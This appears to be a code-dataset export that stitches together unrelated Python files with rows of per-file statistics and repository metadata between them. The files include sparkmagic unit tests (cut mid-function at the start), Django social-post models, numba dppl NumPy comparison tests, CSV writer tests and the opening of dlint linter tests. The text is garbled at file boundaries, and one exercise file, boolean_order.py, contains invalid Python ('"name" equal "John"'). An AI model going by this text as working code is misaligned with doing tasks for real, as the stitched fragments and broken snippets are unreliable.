magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
@with_setup(_setup, _teardown)
def test_send_to_spark_should_print_error_when_str_command_failed():
input_variable_name = "x_in"
input_variable_value = "x_value"
output_variable_name = "x_out"
var_type = "STR"
output_value = "error"
max_rows = 25000
magic.shell.user_ns[input_variable_name] = input_variable_value
magic.spark_controller.run_command.return_value = (False, output_value, "text/plain")
magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
magic.ipython_display.send_error.assert_called_once_with(output_value)
assert not magic.ipython_display.write.called
@with_setup(_setup, _teardown)
def test_send_to_spark_should_print_error_when_df_command_failed():
input_variable_name = "x_in"
input_variable_value = "x_value"
output_variable_name = "x_out"
var_type = "df"
output_value = "error"
max_rows = 25000
magic.shell.user_ns[input_variable_name] = input_variable_value
magic.spark_controller.run_command.return_value = (False, output_value, "text/plain")
magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
magic.ipython_display.send_error.assert_called_once_with(output_value)
assert not magic.ipython_display.write.called
@with_setup(_setup, _teardown)
def test_send_to_spark_should_name_the_output_variable_the_same_as_input_name_when_custom_name_not_provided():
input_variable_name = "x_in"
input_variable_value = output_value = "x_value"
var_type = "str"
output_variable_name = None
max_rows = 25000
magic.shell.user_ns[input_variable_name] = input_variable_value
magic.spark_controller.run_command.return_value = (True, output_value, "text/plain")
expected_message = u'Successfully passed \'{}\' as \'{}\' to Spark kernel'.format(input_variable_name, input_variable_name)
magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
magic.ipython_display.write.assert_called_once_with(expected_message)
assert not magic.ipython_display.send_error.called
@with_setup(_setup, _teardown)
def test_send_to_spark_should_write_successfully_when_everything_is_correct():
input_variable_name = "x_in"
input_variable_value = output_value = "x_value"
output_variable_name = "x_out"
max_rows = 25000
var_type = "str"
magic.shell.user_ns[input_variable_name] = input_variable_value
magic.spark_controller.run_command.return_value = (True, output_value, "text/plain")
expected_message = u'Successfully passed \'{}\' as \'{}\' to Spark kernel'.format(input_variable_name, output_variable_name)
magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
magic.ipython_display.write.assert_called_once_with(expected_message)
assert not magic.ipython_display.send_error.called
@with_setup(_setup, _teardown)
def test_spark_execution_without_output_var():
output_var = None
magic.spark_controller.run_command.return_value = (True,'out',MIMETYPE_TEXT_PLAIN)
magic.execute_spark("", output_var, None, None, None, session, None)
magic.ipython_display.write.assert_called_once_with('out')
assert not magic.spark_controller._spark_store_command.called
magic.spark_controller.run_command.return_value = (False,'out',MIMETYPE_TEXT_PLAIN)
assert_raises(SparkStatementException, magic.execute_spark,"", output_var, None, None, None, session, True)
assert not magic.spark_controller._spark_store_command.called
@with_setup(_setup, _teardown)
def test_spark_execution_with_output_var():
mockSparkCommand = MagicMock()
magic._spark_store_command = MagicMock(return_value=mockSparkCommand)
output_var = "var_name"
df = 'df'
magic.spark_controller.run_command.side_effect = [(True,'out',MIMETYPE_TEXT_PLAIN), df]
magic.execute_spark("", output_var, None, None, None, session, True)
magic.ipython_display.write.assert_called_once_with('out')
magic._spark_store_command.assert_called_once_with(output_var, None, None, None, True)
assert shell.user_ns[output_var] == df
magic.spark_controller.run_command.side_effect = None
magic.spark_controller.run_command.return_value = (False,'out',MIMETYPE_TEXT_PLAIN)
assert_raises(SparkStatementException, magic.execute_spark,"", output_var, None, None, None, session, True)
@with_setup(_setup, _teardown)
def test_spark_exception_with_output_var():
mockSparkCommand = MagicMock()
magic._spark_store_command = MagicMock(return_value=mockSparkCommand)
exception = BadUserDataException("Ka-boom!")
output_var = "var_name"
df = 'df'
magic.spark_controller.run_command.side_effect = [(True,'out',MIMETYPE_TEXT_PLAIN), exception]
assert_raises(BadUserDataException, magic.execute_spark,"", output_var, None, None, None, session, True)
magic.ipython_display.write.assert_called_once_with('out')
magic._spark_store_command.assert_called_once_with(output_var, None, None, None, True)
assert shell.user_ns == {}
@with_setup(_setup, _teardown)
def test_spark_statement_exception():
mockSparkCommand = MagicMock()
magic._spark_store_command = MagicMock(return_value=mockSparkCommand)
exception = BadUserDataException("Ka-boom!")
magic.spark_controller.run_command.side_effect = [(False, 'out', "text/plain"), exception]
assert_raises(SparkStatementException, magic.execute_spark,"", None, None, None, None, session, True)
magic.spark_controller.cleanup.assert_not_called()
@with_setup(_setup, _teardown)
def test_spark_statement_exception_shutdowns_livy_session():
conf.override_all({
"shutdown_session_on_spark_statement_errors": True
})
mockSparkCommand = MagicMock()
magic._spark_store_command = MagicMock(return_value=mockSparkCommand)
exception = BadUserDataException("Ka-boom!")
magic.spark_controller.run_command.side_effect = [(False, 'out', "text/plain"), exception]
assert_raises(SparkStatementException, magic.execute_spark,"", None, None, None, None, session, True)
magic.spark_controller.delete_session_by_name.assert_called_once()
| 39.755932
| 150
| 0.766456
| 1,583
| 11,728
| 5.263424
| 0.108023
| 0.044407
| 0.074412
| 0.06073
| 0.800048
| 0.777724
| 0.772324
| 0.760442
| 0.723236
| 0.674748
| 0
| 0.005002
| 0.130713
| 11,728
| 294
| 151
| 39.891156
| 0.812261
| 0.001791
| 0
| 0.635965
| 0
| 0.008772
| 0.057839
| 0.019564
| 0
| 0
| 0
| 0
| 0.188596
| 1
| 0.096491
| false
| 0.013158
| 0.039474
| 0
| 0.135965
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8337e550b8851ff06b69198bafd1bfc864e8e2fa
| 20
|
py
|
Python
|
python/testData/completion/notImportedQualifiedName/ShowOnlyImmediateAttributesForAliases/numpy/random/__init__.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
python/testData/completion/notImportedQualifiedName/ShowOnlyImmediateAttributesForAliases/numpy/random/__init__.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
python/testData/completion/notImportedQualifiedName/ShowOnlyImmediateAttributesForAliases/numpy/random/__init__.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
def rand():
pass
| 10
| 11
| 0.55
| 3
| 20
| 3.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3
| 20
| 2
| 12
| 10
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
833d77edc98bef37fa7c066507a694abf77e93e8
| 106
|
py
|
Python
|
helper.py
|
vi3k6i5/flask_logging
|
9e089d97a9438b75de3141961d9dc96d86bacee0
|
[
"MIT"
] | 1
|
2019-04-28T15:47:39.000Z
|
2019-04-28T15:47:39.000Z
|
helper.py
|
vi3k6i5/flask_logging
|
9e089d97a9438b75de3141961d9dc96d86bacee0
|
[
"MIT"
] | null | null | null |
helper.py
|
vi3k6i5/flask_logging
|
9e089d97a9438b75de3141961d9dc96d86bacee0
|
[
"MIT"
] | null | null | null |
# app/file helper.py
from __init__ import application
def foo_method():
application.logger.info("hi")
| 21.2
| 33
| 0.754717
| 15
| 106
| 5
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132075
| 106
| 5
| 33
| 21.2
| 0.815217
| 0.169811
| 0
| 0
| 0
| 0
| 0.022989
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
55cf5567b2be2c7d88ba2285cb2478aef72426b2
| 1,861
|
py
|
Python
|
posts/models.py
|
Davinchy1/facebook-lite
|
ad8fc2fc8d91f089f17a430232ed443cbf9c431f
|
[
"MIT"
] | null | null | null |
posts/models.py
|
Davinchy1/facebook-lite
|
ad8fc2fc8d91f089f17a430232ed443cbf9c431f
|
[
"MIT"
] | null | null | null |
posts/models.py
|
Davinchy1/facebook-lite
|
ad8fc2fc8d91f089f17a430232ed443cbf9c431f
|
[
"MIT"
] | null | null | null |
from enum import auto
# from posts.serializers import Shareserializer
from django.db import models
from django.contrib.auth.models import User
from django.db.models.deletion import CASCADE
# Create your models here.
class Post(models.Model):
text=models.TextField()
user=models.ForeignKey(User,on_delete=models.CASCADE)
created_on=models.DateTimeField(auto_now_add=True)
def get_num_like(self):
return Like.objects.filter(post=self).count()
def get_num_share(self):
return Share.objects.filter(post=self).count()
def get_num_comment(self):
return Comment.objects.filter(post=self).count()
class Like(models.Model):
user=models.ForeignKey(User,on_delete=models.CASCADE)
post=models.ForeignKey(Post,on_delete=models.CASCADE)
created_on=models.DateTimeField(auto_now_add=True)
class Meta:
#this makes sure that the user and post pair dont occure more thand once
#e.g(user1, post1) can only exit once
unique_together = ("user","post")
class Share(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
post = models.ForeignKey(Post, on_delete=models.CASCADE)
created_on = models.DateTimeField(auto_now_add=True)
class Meta:
#this makes sure that the user and post pair dont occure more thand once
#e.g(user1, post1) can only exit once
unique_together = ("user","post",)
class Comment(models.Model):
text = models.TextField()
user = models.ForeignKey(User, on_delete=models.CASCADE)
post = models.ForeignKey(Post,on_delete=models.CASCADE)
created_on = models.DateTimeField(auto_now_add=True)
class Meta:
#this makes sure that the user and post pair dont occure more thand once
#e.g(user1, post1) can only exit once
unique_together = ("user","post")
| 33.836364
| 80
| 0.713057
| 262
| 1,861
| 4.958015
| 0.244275
| 0.08622
| 0.075443
| 0.113164
| 0.78445
| 0.764434
| 0.764434
| 0.764434
| 0.710547
| 0.710547
| 0
| 0.003974
| 0.188608
| 1,861
| 54
| 81
| 34.462963
| 0.856291
| 0.211177
| 0
| 0.545455
| 0
| 0
| 0.016472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.121212
| 0.090909
| 0.909091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
55ef313614d1d2f6150c3d00d17154bf04d71f22
| 179
|
py
|
Python
|
Introduction to Python/Introduction to Python Smallpiece 2018/Condition expressions/Boolean operators order/boolean_order.py
|
phamola/firstproject1
|
1e2aaafeb7abf9c82e4c823f197fc1fbefce6416
|
[
"Apache-2.0"
] | null | null | null |
Introduction to Python/Introduction to Python Smallpiece 2018/Condition expressions/Boolean operators order/boolean_order.py
|
phamola/firstproject1
|
1e2aaafeb7abf9c82e4c823f197fc1fbefce6416
|
[
"Apache-2.0"
] | null | null | null |
Introduction to Python/Introduction to Python Smallpiece 2018/Condition expressions/Boolean operators order/boolean_order.py
|
phamola/firstproject1
|
1e2aaafeb7abf9c82e4c823f197fc1fbefce6416
|
[
"Apache-2.0"
] | null | null | null |
name = "John"
age = 17
print(name == "John" or not age > 17)
print(name == "John" or not age > 17)
print("name" is "Ellis" or not ("name" equal "John" and he is 17 years old))
| 19.888889
| 76
| 0.614525
| 33
| 179
| 3.333333
| 0.424242
| 0.218182
| 0.272727
| 0.381818
| 0.545455
| 0.545455
| 0.545455
| 0.545455
| 0.545455
| 0.545455
| 0
| 0.057143
| 0.217877
| 179
| 8
| 77
| 22.375
| 0.728571
| 0
| 0
| 0.4
| 0
| 0
| 0.162011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.6
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
36c06066f62a9854abced621cba3e972966da5b3
| 118
|
py
|
Python
|
tests/project_test.py
|
scottaubrey/data-science-dags
|
f45c4e1bb8e538da57161c20953edca2e66ffd4f
|
[
"MIT"
] | 1
|
2021-09-15T04:47:25.000Z
|
2021-09-15T04:47:25.000Z
|
tests/project_test.py
|
scottaubrey/data-science-dags
|
f45c4e1bb8e538da57161c20953edca2e66ffd4f
|
[
"MIT"
] | 39
|
2021-06-21T05:52:43.000Z
|
2022-03-29T18:39:06.000Z
|
tests/project_test.py
|
scottaubrey/data-science-dags
|
f45c4e1bb8e538da57161c20953edca2e66ffd4f
|
[
"MIT"
] | 1
|
2021-12-23T15:36:54.000Z
|
2021-12-23T15:36:54.000Z
|
def test_can_import_project_package():
import dags # noqa pylint: disable=import-outside-toplevel, unused-import
| 39.333333
| 78
| 0.79661
| 16
| 118
| 5.625
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118644
| 118
| 2
| 79
| 59
| 0.865385
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7fcb26a504a14b4f04d51f7a27dfcab3111cfc7b
| 32
|
py
|
Python
|
dsgn/models/__init__.py
|
joshliu11/DSGN
|
ac693e748ff3a7372b1292c2b7b3796854072030
|
[
"MIT"
] | 166
|
2020-04-20T09:30:54.000Z
|
2021-05-16T07:42:15.000Z
|
dsgn/models/__init__.py
|
joshliu11/DSGN
|
ac693e748ff3a7372b1292c2b7b3796854072030
|
[
"MIT"
] | 15
|
2020-05-12T23:58:01.000Z
|
2021-05-05T12:03:51.000Z
|
dsgn/models/__init__.py
|
joshliu11/DSGN
|
ac693e748ff3a7372b1292c2b7b3796854072030
|
[
"MIT"
] | 35
|
2020-04-27T13:11:42.000Z
|
2021-05-16T07:45:02.000Z
|
from .stereonet import StereoNet
| 32
| 32
| 0.875
| 4
| 32
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09375
| 32
| 1
| 32
| 32
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3d0992e8439e1ebf6191751042a2abae13c64eda
| 121
|
py
|
Python
|
timg_promo/timg_promo/doctype/promo_settings/test_promo_settings.py
|
abdelazizhd/timg_promo
|
f475b7a30bcf89e8c4048ae4f55d1e8a78696495
|
[
"MIT"
] | null | null | null |
timg_promo/timg_promo/doctype/promo_settings/test_promo_settings.py
|
abdelazizhd/timg_promo
|
f475b7a30bcf89e8c4048ae4f55d1e8a78696495
|
[
"MIT"
] | null | null | null |
timg_promo/timg_promo/doctype/promo_settings/test_promo_settings.py
|
abdelazizhd/timg_promo
|
f475b7a30bcf89e8c4048ae4f55d1e8a78696495
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
import frappe
import unittest
class TestPromoSettings(unittest.TestCase):
pass
| 17.285714
| 43
| 0.859504
| 14
| 121
| 7.071429
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107438
| 121
| 7
| 44
| 17.285714
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
182891ac804e67d1d8c69e24b4e7997b70fdb382
| 74
|
py
|
Python
|
src/tentaclio/databases/__init__.py
|
datavaluepeople/tentaclio
|
eb6920a0e115c6c08043063a8c1013d812ec34c8
|
[
"MIT"
] | 12
|
2019-04-30T16:07:42.000Z
|
2021-12-08T08:02:09.000Z
|
src/tentaclio/databases/__init__.py
|
octoenergy/tentaclio
|
eb6920a0e115c6c08043063a8c1013d812ec34c8
|
[
"MIT"
] | 74
|
2019-04-25T11:18:22.000Z
|
2022-01-18T11:31:14.000Z
|
src/tentaclio/databases/__init__.py
|
datavaluepeople/tentaclio
|
eb6920a0e115c6c08043063a8c1013d812ec34c8
|
[
"MIT"
] | 4
|
2019-05-05T13:13:21.000Z
|
2022-01-14T00:33:07.000Z
|
"""Tentaclio's db registry and api."""
from .db_registry import * # noqa
| 24.666667
| 38
| 0.689189
| 11
| 74
| 4.545455
| 0.818182
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 74
| 2
| 39
| 37
| 0.806452
| 0.513514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
185d99ca8292d04352dd1580a9c79a6b7bbea7f8
| 4,610
|
py
|
Python
|
numba/dppl/tests/dppl/test_numpy_comparison_functions.py
|
AlexanderKalistratov/numba
|
f5c5ba339b980830e73f1dc76efb6b043adcddbb
|
[
"BSD-2-Clause"
] | null | null | null |
numba/dppl/tests/dppl/test_numpy_comparison_functions.py
|
AlexanderKalistratov/numba
|
f5c5ba339b980830e73f1dc76efb6b043adcddbb
|
[
"BSD-2-Clause"
] | null | null | null |
numba/dppl/tests/dppl/test_numpy_comparison_functions.py
|
AlexanderKalistratov/numba
|
f5c5ba339b980830e73f1dc76efb6b043adcddbb
|
[
"BSD-2-Clause"
] | null | null | null |
#! /usr/bin/env python
from __future__ import print_function
from timeit import default_timer as time
import sys
import numpy as np
from numba import dppl, njit
from numba.dppl.testing import unittest
from numba.dppl.testing import DPPLTestCase
import dppl.ocldrv as ocldrv
class TestNumpy_comparison_functions(DPPLTestCase):
a = np.array([4,5,6])
b = np.array([2,6,6])
def test_greater(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.greater(a, b)
return c
c = f(self.a, self.b)
d = np.greater(self.a, self.b)
self.assertTrue(np.all(c == d))
def test_greater_equal(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.greater_equal(a, b)
return c
c = f(self.a, self.b)
d = np.greater_equal(self.a, self.b)
self.assertTrue(np.all(c == d))
def test_less(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.less(a, b)
return c
c = f(self.a, self.b)
d = np.less(self.a, self.b)
self.assertTrue(np.all(c == d))
def test_less_equal(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.less_equal(a, b)
return c
c = f(self.a, self.b)
d = np.less_equal(self.a, self.b)
self.assertTrue(np.all(c == d))
def test_not_equal(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.not_equal(a, b)
return c
c = f(self.a, self.b)
d = np.not_equal(self.a, self.b)
self.assertTrue(np.all(c == d))
def test_equal(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.equal(a, b)
return c
c = f(self.a, self.b)
d = np.equal(self.a, self.b)
self.assertTrue(np.all(c == d))
def test_logical_and(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.logical_and(a, b)
return c
a = np.array([True, True, False])
b = np.array([True, False, False])
c = f(a, b)
d = np.logical_and(a, b)
self.assertTrue(np.all(c == d))
def test_logical_or(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.logical_or(a, b)
return c
a = np.array([True, True, False])
b = np.array([True, False, False])
c = f(a, b)
d = np.logical_or(a, b)
self.assertTrue(np.all(c == d))
def test_logical_xor(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.logical_xor(a, b)
return c
a = np.array([True, True, False])
b = np.array([True, False, False])
c = f(a, b)
d = np.logical_xor(a, b)
self.assertTrue(np.all(c == d))
def test_logical_not(self):
@njit(parallel={'offload':True})
def f(a):
c = np.logical_not(a)
return c
a = np.array([True, True, False])
c = f(a)
d = np.logical_not(a)
self.assertTrue(np.all(c == d))
def test_maximum(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.maximum(a, b)
return c
a = np.array([5,6,7,np.nan], dtype=np.float32)
b = np.array([5,7,6,100], dtype=np.float32)
c = f(a, b)
d = np.maximum(a, b)
np.testing.assert_equal(c, d)
def test_minimum(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.minimum(a, b)
return c
a = np.array([5,6,7,np.nan], dtype=np.float32)
b = np.array([5,7,6,100], dtype=np.float32)
c = f(a, b)
d = np.minimum(a, b)
np.testing.assert_equal(c, d)
def test_fmax(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.fmax(a, b)
return c
a = np.array([5,6,7,np.nan], dtype=np.float32)
b = np.array([5,7,6,100], dtype=np.float32)
c = f(a, b)
d = np.fmax(a, b)
np.testing.assert_equal(c, d)
def test_fmin(self):
@njit(parallel={'offload':True})
def f(a, b):
c = np.fmin(a, b)
return c
a = np.array([5,6,7,np.nan], dtype=np.float32)
b = np.array([5,7,6,100], dtype=np.float32)
c = f(a, b)
d = np.fmin(a, b)
np.testing.assert_equal(c, d)
if __name__ == '__main__':
unittest.main()
| 23.641026
| 54
| 0.500868
| 709
| 4,610
| 3.179126
| 0.09732
| 0.035492
| 0.026619
| 0.142857
| 0.824312
| 0.794144
| 0.794144
| 0.794144
| 0.744454
| 0.744454
| 0
| 0.01906
| 0.339913
| 4,610
| 194
| 55
| 23.762887
| 0.721656
| 0.004555
| 0
| 0.592857
| 0
| 0
| 0.023104
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.2
| false
| 0
| 0.057143
| 0
| 0.378571
| 0.007143
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a109c9c1554a48fc9b5f44f6d0e8aebeff6c301b
| 43
|
py
|
Python
|
agents/__init__.py
|
seungjaeryanlee/osim-rl-helper
|
5a4340321e765089afd3062093c797c04bfdbeec
|
[
"MIT"
] | 41
|
2018-06-27T15:42:26.000Z
|
2020-03-20T21:50:05.000Z
|
agents/__init__.py
|
BenjaminBush/skeletor
|
9e7d139948aaeae6e688d17016b63fb9ea895734
|
[
"MIT"
] | 5
|
2018-08-23T08:07:23.000Z
|
2022-01-02T10:44:52.000Z
|
agents/__init__.py
|
seungjaeryanlee/osim-rl-helper
|
5a4340321e765089afd3062093c797c04bfdbeec
|
[
"MIT"
] | 8
|
2018-07-29T03:18:02.000Z
|
2018-11-06T16:54:20.000Z
|
from .DoNothingAgent import DoNothingAgent
| 21.5
| 42
| 0.883721
| 4
| 43
| 9.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 43
| 1
| 43
| 43
| 0.974359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a1627a40af07553dd06cfa948539d911c166c30f
| 2,119
|
py
|
Python
|
test/test_output.py
|
Semooze/clean_data
|
1d56bbbd0728cf8a5f7f80ed40a1cd659bb7f694
|
[
"MIT"
] | null | null | null |
test/test_output.py
|
Semooze/clean_data
|
1d56bbbd0728cf8a5f7f80ed40a1cd659bb7f694
|
[
"MIT"
] | null | null | null |
test/test_output.py
|
Semooze/clean_data
|
1d56bbbd0728cf8a5f7f80ed40a1cd659bb7f694
|
[
"MIT"
] | 1
|
2020-03-09T14:04:28.000Z
|
2020-03-09T14:04:28.000Z
|
import unittest
from morphling.output import Writer
class TestWriter(unittest.TestCase):
def test_be_able_to_write_file(self):
actual = 'test data'
output_path = 'test/output_file/basic_write'
obj = Writer()
obj.write(actual, output_path)
obj.write(actual, output_path)
with open(output_path, 'r') as reader:
expect = reader.read()
self.assertEqual(actual, expect)
def test_be_able_to_append_data_into_existing_file(self):
actual = 'test data'
output_path = 'test/output_file/basic_write'
obj = Writer()
obj.write(actual, output_path)
obj.append(actual, output_path)
with open(output_path, 'r') as reader:
expect = reader.read()
self.assertEqual(actual + actual, expect)
def test_be_able_to_write_csv_file(self):
data = [['name', 'age', 'color'], ['John hopskin', 15, 'Blue sky']]
output_path = 'test/output_file/test_write_csv.csv'
obj = Writer()
obj.to_csv(data, output_path)
with open(output_path, 'r') as reader:
expect = reader.read()
self.assertEqual('name,age,color\nJohn hopskin,15,Blue sky\n', expect)
def test_be_able_to_write_csv_when_there_is_new_line_beween_data(self):
data = [['name', 'age', 'color'], ['John\nhopskin', 15, 'Blue sky']]
output_path = 'test/output_file/test_write_csv_new_line.csv'
obj = Writer()
obj.to_csv(data, output_path)
with open(output_path, 'r') as reader:
expect = reader.read()
self.assertEqual('name,age,color\n"John\nhopskin",15,Blue sky\n', expect)
def test_be_able_to_write_csv_when_there_is_comma_between_data(self):
data = [['name', 'age', 'color'], ['John, hopskin', 15, 'Blue, sky']]
output_path = 'test/output_file/test_write_csv_comma.csv'
obj = Writer()
obj.to_csv(data, output_path)
with open(output_path, 'r') as reader:
expect = reader.read()
self.assertEqual('name,age,color\n"John, hopskin",15,"Blue, sky"\n', expect)
| 39.981132
| 84
| 0.637093
| 290
| 2,119
| 4.386207
| 0.182759
| 0.133648
| 0.056604
| 0.051101
| 0.882075
| 0.865566
| 0.826258
| 0.779874
| 0.757075
| 0.757075
| 0
| 0.007407
| 0.235488
| 2,119
| 52
| 85
| 40.75
| 0.777778
| 0
| 0
| 0.555556
| 0
| 0
| 0.204342
| 0.111845
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.111111
| false
| 0
| 0.044444
| 0
| 0.177778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a17d9f3e9208c27cd8e0ba8dc6085b7795001e84
| 16,353
|
py
|
Python
|
tests/test_helpers/test_bad_module_attribute_use.py
|
minusworld/dlint
|
663c01f7ac2687c6857373668c890ff7b4def23d
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_helpers/test_bad_module_attribute_use.py
|
minusworld/dlint
|
663c01f7ac2687c6857373668c890ff7b4def23d
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_helpers/test_bad_module_attribute_use.py
|
minusworld/dlint
|
663c01f7ac2687c6857373668c890ff7b4def23d
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import unittest
import dlint
def get_bad_module_attribute_use_implementation(illegal_module_attributes):
class Cls(dlint.linters.helpers.bad_module_attribute_use.BadModuleAttributeUseLinter):
_code = 'DUOXXX'
_error_tmpl = 'DUOXXX error message'
@property
def illegal_module_attributes(self):
return illegal_module_attributes
return Cls()
class TestBadModuleAttributeUse(dlint.test.base.BaseTest):
def test_empty_code(self):
python_node = self.get_ast_node(
"""
"""
)
linter = get_bad_module_attribute_use_implementation({'foo': ['bar']})
